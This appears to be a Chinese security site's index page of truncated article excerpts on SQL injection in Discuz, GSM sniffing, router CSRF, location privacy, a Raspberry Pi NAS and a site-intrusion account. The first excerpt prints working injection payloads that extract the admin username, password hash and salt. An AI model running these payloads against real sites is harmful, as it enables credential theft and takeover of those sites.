高大上的漏洞Discuz x1.5– x2版本 二次注射

a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment=' 再给出一些语句。 ',`subject`=(/*!select*/ group_concat(uid,':') from pre_common_member where groupid=1),comment='//查看管理用户 ',`subject`=(/*!select*/ group_concat(uid,':') from pre_common_member where groupid=2),……

个人位置信息安全(GPS)

随着无线技术的发展,个人位置信息安全也成为一个安全议题,常见的定位手段有1.全球定位系统(GPS)2.辅助全球定位系统(AGPS)3.GSM蜂窝基站定位4.WIFI定位  面对此类通过无线电方式的定位,我们可以采用Wave Bubble进行无线电屏蔽达到防止定位的目的. 但在某些情形下Wave Bubble并不能完全逃避GPS追踪.信号的消失点及GPS运动踪迹会暴露可能的行动路径.这类情况下……

Raspberry Pi搭建NAS服务器及打印服务器

NAS服务器搭建步骤如下: sudo apt-get install samba sudo apt-get install samba-common-bin 安装完成后,我们在/ect/samba/文件夹中找到这个文件smb.conf,它是用来对samba服务配置用的,用nano文件编辑器打开后发现里面很是复杂,没关系,我们只需要一个简单smb.conf。先将smb.conf重命名为smb.conf.backup。然后用下面的smb.conf替换原来的smb.conf [globa……

GSM Hackeing 之 SMS Sniffer 学习

0x00 前言 最近看到微博以及一些论坛谈论关于GSM Hacking的比较多,使用的是开源的程序 osmocombb 和摩托罗拉的手机 c118。我也凑凑热闹,找来相关资料进行学习,国内关于这方面的资料的确太少了,大都是一些编译 osmocombb 的资料,而没有更深入的学习资料,比如如何进行 GSM SMS 的 Sniffer,估计是在我大宋朝这个太敏感了吧。 不过最近在 http://www.hacklook.……

CSRF劫持TP-LINK-DNS

0x00 背景 路由被CSRF攻击,修改DNS的话题最近一直比较活跃,但是国内貌似没有一个技术文章详细的分析此漏洞,漏洞成因比较简单,本篇来科普一下。 本篇讲得是一个利用CVE-2013-2645的漏洞,来修改TP-LINK的DNS案例,针对其他路由的攻击大同小异。   0x01 EXP分析 攻击者会在自己的网站或者已经受他控制的网站上加入一段javascript代码: document.write("&……

通过Mic高频物理无线传输病毒

三年前,安全顾问、Pwn2Own黑客挑战赛创始人Dragos Ruiu在实验室里注意到一件非同寻常的事情:   刚刚全新安装OS X的MacBook Air笔记本自动更新了BIOS固件,之后当他试图从CD ROM启动机器时遭到了拒绝,他还发现机器会不做任何提示删除数据和撤销配置更改。   随后几个月,事情越发离奇,仿佛是出自科幻惊悚片:一台运行Open BSD的计算机也开始不做任……

一次曲折的拿站实录——由域名权限到服务器权限

拿到网站目测了一下,ASP站,看似比较好拿,Google了一下注入点发现几个注入目标,随手or 1=1测试了一下,发现有WAF安全狗操出伪造user-agent神器伪造Baidu蜘蛛,无果。wwwscan扫了一下,WAF给403掉了。无奈X-scan慢速跑了一下,也只发现80和21端口。21跑弱口令也无果。网站手动遍历了一下后台,防护很严实,没有找出后台。眼看程序下手没有办法,尝试了下社工域……